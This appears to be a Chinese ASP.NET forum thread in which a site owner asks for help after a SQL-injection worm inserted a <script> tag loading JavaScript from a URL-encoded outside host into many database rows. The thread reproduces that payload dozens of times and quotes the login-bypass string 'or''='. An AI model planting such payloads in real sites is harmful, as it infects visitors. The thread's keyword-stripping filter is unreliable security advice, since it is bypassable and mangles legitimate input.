最近服务器或者程序可能哪里出了漏洞,数据表里老是被插入<script src=http://%61%31%38%38%2E%77%73/1.js></script>这些东西,烦啊
哪位大哥?怎么解决好..
哪位大哥?怎么解决好..
解决方案 »
- 并发安全问题
- jquery ajax加载数据问题
- dwz 搜索分页问题
- 关于用Response.Redirect重定向到新后, 页面显示不了最新数据. 急!!急!!急!!急!!急!!急!!
- |M| 问个绑定时加多一行的问题 下次补分
- 在asp.net/c#下怎样获取硬盘参数?我的目的是要一个程序只能安装在一台电脑上,怎样做呢?
- 怎样获得DataGrid控件中的所有值,并把它们填到数据库中?
- 过程的执行
- asp.net下GrivdView如何手动增加一行,并且新的一行可编辑,但不刷新页面。
- ★★★★★超难问题,解决者高分相送,不够在加
- 在asp.net中如何实现类似qq表情功能
- 寻ASP.NET+SQL SERVER人事管理系统源代码
如果数据库写入,就说明程序有问题,从最简单的 sql注入开始检查吧 或者后台登陆的那个经典用户名 'or''=' 呵呵,goodluck
1000 1 10001 普通本专科</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1000 2 10002 专接本教育</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 1 10011 河北</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 2 10012 北京</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 3 10013 天津</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 4 10014 山西</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 5 10015 内蒙古</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 6 10016 辽宁</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 7 10017 吉林</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 8 10018 黑龙江</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 9 10019 上海</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 10 100110 江苏</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 11 100111 浙江</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 12 100112 安徽</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 13 100113 福建</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 14 100114 江西</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 15 100115 山东</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 16 100116 河南</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 17 100117 湖北</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 18 100118 湖南</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 19 100119 广东</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 20 100120 广西</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 21 100121 海南</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 22 100122 重庆</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 23 100123 四川</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 24 100124 贵州</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 25 100125 云南</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 26 100126 西藏</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 27 100127 陕西</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 28 100128 甘肃</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 29 100129 青海</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 30 100130 宁夏</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 31 100131 新疆</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 32 100132 台湾</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 33 100133 香港</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 34 100134 澳门</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1001 35 100135 其他</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1003 1 10031 招生计划</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1003 2 10032 录取政策</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
1003 3 10033 其他</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!
关注下.你google下<script src=http://%61%31%38%38%2E%77%73/1.js> 就会发现很多页面都有这个问题
估计是个sql注入的蠕虫病毒."恭喜"二位了.估计是个新病毒啊.呵呵
http://www.google.cn/search?q=%3Cscript+src%3Dhttp://%2561%2531%2538%2538%252E%2577%2573/1.js%3E+&complete=1&hl=zh-CN&newwindow=1&rlz=1T4GGLS_zh-CNCN273CN273&start=10&sa=N
最好的办法用存储过程。
string key = base.Request.QueryString["id"]; key = key.ToLower();
key = key.Replace("select", "");
key = key.Replace("update", "");
key = key.Replace("delete", "");
key = key.Replace("insert", "");
key = key.Replace("--", "");
key = key.Replace("'", "");
key = key.Replace(",", "");
key = key.Replace("and", "");
key = key.Replace("or", "");
key = key.Replace("</title>", "");
key = key.Replace("script", "");